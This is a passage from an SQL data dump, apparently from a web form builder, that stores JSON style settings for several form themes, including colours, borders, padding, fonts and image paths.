#9eaab1\",\"SHPBGColor\":\"#d82534\",\"SHPColor\":\"#ffffff\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#f1cb15\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#424242\",\"BPPadding\":\"6px 10px\",\"BPMargin\":\"0 15px 0 0 \",\"BPBorderColor\":\"#ffffff\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"2px 2px 2px #9eaab1\",\"BHPBGColor\":\"#435c71\",\"BHPColor\":\"#e6c41b\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#f05e22\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0\",\"PSAPBorderColor\":\"\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#ffffff\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"bold\",\"PSDPColor\":\"#435c71\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#435c71\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"1\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#3b3b3b\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#d82534\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#3b3b3b\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#d82534\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"16\",\"CBPFontWeight\":\"lighter\",\"CBPColor\":\"#e6c41b\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#d82534\",\"CBHPBorderColor\":\"#ffffff\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#4d4d4d\",\"MBPFontSize\":\"16\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#4d4d4d\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#f05e22\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#f05e22\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#f05e22\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(10,'Theme 10','{\"GPFontFamily\":\"arial\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"35\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"3\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#139e92\",\"HPWidth\":\"100\",\"HTPWidth\":\"30\",\"HPPadding\":\"10px\",\"HPMargin\":\"\",\"HPTextAlign\":\"center\",\"HPBorderColor\":\"#b7b7b7\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"1\",\"HPBorderRadius\":\"3\",\"HTPFontSize\":\"25\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"14\",\"HDPColor\":\"#137065\",\"HIPAlign\":\"top\",\"HIPWidth\":\"200\",\"HIPHeight\":\"\",\"GPBGColor\":\"#f8f8f8\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"bold\",\"GPWidth\":\"100\",\"GTPWidth\":\"100\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#494949\",\"GPPadding\":\"0\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#494949\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#f8f8f8\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px 20px 10px 10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"80\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"26\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#ffffff\",\"IPColor\":\"#6e6e6e\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#989898\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"3\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/3.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#989898\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#989898\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"4\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"\",\"MCPWidth\":\"14\",\"MCPHeight\":\"14\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#989898\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"\",\"MCCPBackground\":\"images/themes/checkboxes/3.png\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"16\",\"MCCPHeight\":\"16\",\"MCCPMargin\":\"0 0 2px 0\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"right\",\"SPBGColor\":\"#139e92\",\"SPWidth\":\"\",\"SPHeight\":\"\",\"SPFontSize\":\"15\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"6px 10px\",\"SPMargin\":\"\",\"SPBorderColor\":\"#b0b5b8\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"3\",\"SPBoxShadow\":\"2px 2px 2px #b0b5b8\",\"SHPBGColor\":\"#5bbcb0\",\"SHPColor\":\"#ffffff\",\"SHPBorderColor\":\"#ffffff\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#dfc97a\",\"BPWidth\":\"\",\"BPHeight\":\"\",\"BPFontSize\":\"15\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#272727\",\"BPPadding\":\"6px 10px\",\"BPMargin\":\"0 15px 0 0 \",\"BPBorderColor\":\"#ffffff\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"3\",\"BPBoxShadow\":\"2px 2px 2px #b0b5b8\",\"BHPBGColor\":\"#2d4d5f\",\"BHPColor\":\"#ffffff\",\"BHPBorderColor\":\"#ffffff\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#139e92\",\"PSAPFontSize\":\"16\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0\",\"PSAPBorderColor\":\"\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"2\",\"PSAPBorderRadius\":\"3\",\"PSDPBGColor\":\"#f8f8f8\",\"PSDPFontSize\":\"16\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#272727\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"4px 6px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderTop\":\"top\",\"PSDPBorderRight\":\"right\",\"PSDPBorderBottom\":\"bottom\",\"PSDPBorderLeft\":\"left\",\"PSDPBorderColor\":\"#dfc97a\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"1\",\"PSDPBorderRadius\":\"3\",\"PSAPAlign\":\"right\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#3b3b3b\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#137065\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#3b3b3b\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#137065\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"10px\",\"CBPRight\":\"10px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"16\",\"CBPFontWeight\":\"lighter\",\"CBPColor\":\"#757575\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#139e92\",\"CBHPBorderColor\":\"#ffffff\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#139e92\",\"MBPFontSize\":\"16\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#ffffff\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderRight\":\"right\",\"MBPBorderBottom\":\"bottom\",\"MBPBorderLeft\":\"left\",\"MBPBorderColor\":\"#139e92\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#ffffff\",\"MBHPColor\":\"#137065\",\"MBHPBorderTop\":\"top\",\"MBHPBorderRight\":\"right\",\"MBHPBorderBottom\":\"bottom\",\"MBHPBorderLeft\":\"left\",\"MBHPBorderColor\":\"#137065\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#afafaf\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#f82c2c\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(11,'Theme 11','{\"GPFontFamily\":\"Roboto\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"40\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#f2ecde\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px 15px\",\"HPMargin\":\"\",\"HPTextAlign\":\"left\",\"HPBorderTop\":\"top\",\"HPBorderColor\":\"#7a134b\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"4\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"19\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#042325\",\"HDPFontSize\":\"14\",\"HDPColor\":\"#8a877f\",\"HIPAlign\":\"right\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#d8d5c6\",\"GPFontSize\":\"14\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#37352f\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#37352f\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#d8d5c6\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"28\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#b7b3a7\",\"IPColor\":\"#ffffff\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#b7b3a7\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#ffffff\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#7a134b\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#7a134b\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"4\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#ffffff\",\"MCPWidth\":\"12\",\"MCPHeight\":\"12\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#7a134b\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 3px\",\"MCPBorderRadius\":\"0\",\"MCPBoxShadow\":\"\",\"MCCPBGColor\":\"#7a134b\",\"MCCPBackground\":\"\",\"MCCPBGRepeat\":\"no-repeat\",\"MCCPBGPos1\":\"\",\"MCCPBGPos2\":\"\",\"MCCPWidth\":\"8\",\"MCCPHeight\":\"8\",\"MCCPMargin\":\"2\",\"MCCPBorderRadius\":\"0\",\"SPAlign\":\"left\",\"SPBGColor\":\"#7a134b\",\"SPWidth\":\"130\",\"SPHeight\":\"28\",\"SPFontSize\":\"14\",\"SPFontWeight\":\"normal\",\"SPColor\":\"#ffffff\",\"SPPadding\":\"0px 5px\",\"SPMargin\":\"0 10px 0 0\",\"SPBorderTop\":\"top\",\"SPBorderRight\":\"right\",\"SPBorderBottom\":\"bottom\",\"SPBorderLeft\":\"left\",\"SPBorderColor\":\"#7a134b\",\"SPBorderType\":\"solid\",\"SPBorderWidth\":\"1\",\"SPBorderRadius\":\"0\",\"SPBoxShadow\":\"\",\"SHPBGColor\":\"#630538\",\"SHPColor\":\"#ffffff\",\"SHPBorderTop\":\"top\",\"SHPBorderRight\":\"right\",\"SHPBorderBottom\":\"bottom\",\"SHPBorderLeft\":\"left\",\"SHPBorderColor\":\"#630538\",\"SHPBorderType\":\"solid\",\"SHPBorderWidth\":\"1\",\"BPBGColor\":\"#f2ecde\",\"BPWidth\":\"60\",\"BPHeight\":\"28\",\"BPFontSize\":\"14\",\"BPFontWeight\":\"normal\",\"BPColor\":\"#37352f\",\"BPPadding\":\"0px 5px\",\"BPMargin\":\"0 15px 0 0\",\"BPBorderTop\":\"top\",\"BPBorderRight\":\"right\",\"BPBorderBottom\":\"bottom\",\"BPBorderLeft\":\"left\",\"BPBorderColor\":\"#f2ecde\",\"BPBorderType\":\"solid\",\"BPBorderWidth\":\"1\",\"BPBorderRadius\":\"0\",\"BPBoxShadow\":\"\",\"BHPBGColor\":\"#f2ecde\",\"BHPColor\":\"#37352f\",\"BHPBorderTop\":\"top\",\"BHPBorderRight\":\"right\",\"BHPBorderBottom\":\"bottom\",\"BHPBorderLeft\":\"left\",\"BHPBorderColor\":\"#f2ecde\",\"BHPBorderType\":\"solid\",\"BHPBorderWidth\":\"1\",\"PSAPBGColor\":\"#7a134b\",\"PSAPFontSize\":\"14\",\"PSAPFontWeight\":\"normal\",\"PSAPColor\":\"#ffffff\",\"PSAPHeight\":\"\",\"PSAPLineHeight\":\"\",\"PSAPPadding\":\"8px\",\"PSAPMargin\":\"0 0 -2px  0\",\"PSAPBorderTop\":\"top\",\"PSAPBorderRight\":\"right\",\"PSAPBorderLeft\":\"left\",\"PSAPBorderColor\":\"#7a134b\",\"PSAPBorderType\":\"solid\",\"PSAPBorderWidth\":\"3\",\"PSAPBorderRadius\":\"0\",\"PSDPBGColor\":\"#f2ecde\",\"PSDPFontSize\":\"14\",\"PSDPFontWeight\":\"normal\",\"PSDPColor\":\"#000000\",\"PSDPHeight\":\"\",\"PSDPLineHeight\":\"\",\"PSDPPadding\":\"8px\",\"PSDPMargin\":\"0 0 0 -3px\",\"PSDPBorderColor\":\"#a3a3a3\",\"PSDPBorderType\":\"solid\",\"PSDPBorderWidth\":\"2\",\"PSDPBorderRadius\":\"\",\"PSAPAlign\":\"left\",\"PSAPWidth\":\"\",\"PPAPWidth\":\"100%\",\"NBPBGColor\":\"\",\"NBPWidth\":\"\",\"NBPHeight\":\"\",\"NBPLineHeight\":\"\",\"NBPColor\":\"#7a134b\",\"NBPPadding\":\"4px 10px\",\"NBPMargin\":\"0px\",\"NBPBorderColor\":\"#777777\",\"NBPBorderType\":\"solid\",\"NBPBorderWidth\":\"1\",\"NBPBorderRadius\":\"0\",\"NBPBoxShadow\":\"\",\"NBHPBGColor\":\"\",\"NBHPColor\":\"#630538\",\"NBHPBorderColor\":\"#787878\",\"NBHPBorderType\":\"solid\",\"NBHPBorderWidth\":\"1\",\"PBPBGColor\":\"\",\"PBPWidth\":\"100\",\"PBPHeight\":\"\",\"PBPLineHeight\":\"\",\"PBPColor\":\"#7a134b\",\"PBPPadding\":\"\",\"PBPMargin\":\"0px\",\"PBPBorderColor\":\"#777777\",\"PBPBorderType\":\"solid\",\"PBPBorderWidth\":\"1\",\"PBPBorderRadius\":\"0\",\"PBPBoxShadow\":\"\",\"PBHPBGColor\":\"\",\"PBHPColor\":\"#630538\",\"PBHPBorderColor\":\"#787878\",\"PBHPBorderType\":\"solid\",\"PBHPBorderWidth\":\"1\",\"CBPPosition\":\"absolute\",\"CBPTop\":\"6px\",\"CBPRight\":\"6px\",\"CBPBottom\":\"\",\"CBPLeft\":\"\",\"CBPBGColor\":\"\",\"CBPFontSize\":\"18\",\"CBPFontWeight\":\"normal\",\"CBPColor\":\"#7a134b\",\"CBPPadding\":\"0px\",\"CBPMargin\":\"0px\",\"CBPBorderColor\":\"#ffffff\",\"CBPBorderType\":\"solid\",\"CBPBorderWidth\":\"1\",\"CBPBorderRadius\":\"0\",\"CBHPBGColor\":\"\",\"CBHPColor\":\"#630538\",\"CBHPBorderColor\":\"#737373\",\"CBHPBorderType\":\"solid\",\"CBHPBorderWidth\":\"1\",\"MBPBGColor\":\"#f2ecde\",\"MBPFontSize\":\"15\",\"MBPFontWeight\":\"normal\",\"MBPColor\":\"#000000\",\"MBPTextAlign\":\"center\",\"MBPPadding\":\"10px\",\"MBPMargin\":\"\",\"MBPBorderTop\":\"top\",\"MBPBorderColor\":\"#7a134b\",\"MBPBorderType\":\"solid\",\"MBPBorderWidth\":\"2\",\"MBPBorderRadius\":\"0\",\"MBHPBGColor\":\"#f2ecde\",\"MBHPColor\":\"#7a134b\",\"MBHPBorderTop\":\"top\",\"MBHPBorderColor\":\"#7a134b\",\"MBHPBorderType\":\"solid\",\"MBHPBorderWidth\":\"2\",\"OPDeInputColor\":\"#ffffff\",\"OPFontStyle\":\"normal\",\"OPRColor\":\"#ff1313\",\"OPDPIcon\":\"images/themes/date-pickers/2.png\",\"OPDPRepeat\":\"no-repeat\",\"OPDPPos1\":\"0%\",\"OPDPPos2\":\"10%\",\"OPDPMargin\":\"3px 0 0 -23px\",\"OPFBgUrl\":\"images/themes/file-uploads/2.png\",\"OPFBGRepeat\":\"no-repeat\",\"OPFPos1\":\"0%\",\"OPFPos2\":\"10%\",\"OPGWidth\":\"100\",\"CUPCSS\":\"\"}',0,2),(12,'Theme 12','{\"GPFontFamily\":\"trebuchet ms\",\"AGPWidth\":\"100\",\"AGPSPWidth\":\"40\",\"AGPPadding\":\"\",\"AGPMargin\":\"0 auto\",\"AGPBorderColor\":\"#ffffff\",\"AGPBorderType\":\"solid\",\"AGPBorderWidth\":\"1\",\"AGPBorderRadius\":\"0\",\"AGPBoxShadow\":\"\",\"HPAlign\":\"top\",\"HPBGColor\":\"#5d98b1\",\"HPWidth\":\"100\",\"HTPWidth\":\"40\",\"HPPadding\":\"10px 15px\",\"HPMargin\":\"\",\"HPTextAlign\":\"left\",\"HPBorderTop\":\"top\",\"HPBorderColor\":\"#ffffff\",\"HPBorderType\":\"solid\",\"HPBorderWidth\":\"5\",\"HPBorderRadius\":\"0\",\"HTPFontSize\":\"22\",\"HTPWeight\":\"bold\",\"HTPColor\":\"#ffffff\",\"HDPFontSize\":\"14\",\"HDPColor\":\"#ffffff\",\"HIPAlign\":\"left\",\"HIPWidth\":\"80\",\"HIPHeight\":\"\",\"GPBGColor\":\"#36748e\",\"GPFontSize\":\"15\",\"GPFontWeight\":\"normal\",\"GPWidth\":\"100\",\"GTPWidth\":\"60\",\"GPAlign\":\"center\",\"GPBackground\":\"\",\"GPBackgroundRepeat\":\"no-repeat\",\"GPBGPosition1\":\"\",\"GPBGPosition2\":\"\",\"GPBGSize1\":\"\",\"GPBGSize2\":\"\",\"GPColor\":\"#ffffff\",\"GPPadding\":\"10px\",\"GPMargin\":\"\",\"GPBorderColor\":\"#ffffff\",\"GPBorderType\":\"solid\",\"GPBorderWidth\":\"1\",\"GPBorderRadius\":\"0\",\"GPMLFontSize\":\"14\",\"GPMLFontWeight\":\"normal\",\"GPMLColor\":\"#ffffff\",\"GPMLPadding\":\"0px 5px 0px 0px\",\"GPMLMargin\":\"0px\",\"SEPBGColor\":\"#36748e\",\"SEPPadding\":\"\",\"SEPMargin\":\"\",\"COPPadding\":\"10px\",\"COPMargin\":\"0px\",\"FPWidth\":\"70\",\"FPPadding\":\"15px 0 0 0\",\"FPMargin\":\"0 auto\",\"IPHeight\":\"28\",\"IPFontSize\":\"13\",\"IPFontWeight\":\"normal\",\"IPBGColor\":\"#204a5c\",\"IPColor\":\"#ffffff\",\"IPPadding\":\"0px 5px\",\"IPMargin\":\"0px\",\"IPBorderTop\":\"top\",\"IPBorderRight\":\"right\",\"IPBorderBottom\":\"bottom\",\"IPBorderLeft\":\"left\",\"IPBorderColor\":\"#204a5c\",\"IPBorderType\":\"solid\",\"IPBorderWidth\":\"1\",\"IPBorderRadius\":\"0\",\"IPBoxShadow\":\"\",\"SBPAppearance\":\"none\",\"SBPBackground\":\"images/themes/drop-downs/2.png\",\"SBPBGRepeat\":\"no-repeat\",\"SBPBGPos1\":\"95%\",\"SBPBGPos2\":\"50%\",\"SBPBGSize1\":\"8%\",\"SBPBGSize2\":\"32%\",\"SCPBGColor\":\"#204a5c\",\"SCPWidth\":\"14\",\"SCPHeight\":\"14\",\"SCPBorderTop\":\"top\",\"SCPBorderRight\":\"right\",\"SCPBorderBottom\":\"bottom\",\"SCPBorderLeft\":\"left\",\"SCPBorderColor\":\"#204a5c\",\"SCPBorderType\":\"solid\",\"SCPBorderWidth\":\"1\",\"SCPMargin\":\"0px 3px\",\"SCPBorderRadius\":\"15\",\"SCPBoxShadow\":\"\",\"SCCPBGColor\":\"#ffffff\",\"SCCPWidth\":\"6\",\"SCCPHeight\":\"6\",\"SCCPMargin\":\"4\",\"SCCPBorderRadius\":\"10\",\"MCPBGColor\":\"#204a5c\",\"MCPWidth\":\"12\",\"MCPHeight\":\"12\",\"MCPBorderTop\":\"top\",\"MCPBorderRight\":\"right\",\"MCPBorderBottom\":\"bottom\",\"MCPBorderLeft\":\"left\",\"MCPBorderColor\":\"#204a5c\",\"MCPBorderType\":\"solid\",\"MCPBorderWidth\":\"1\",\"MCPMargin\":\"0px 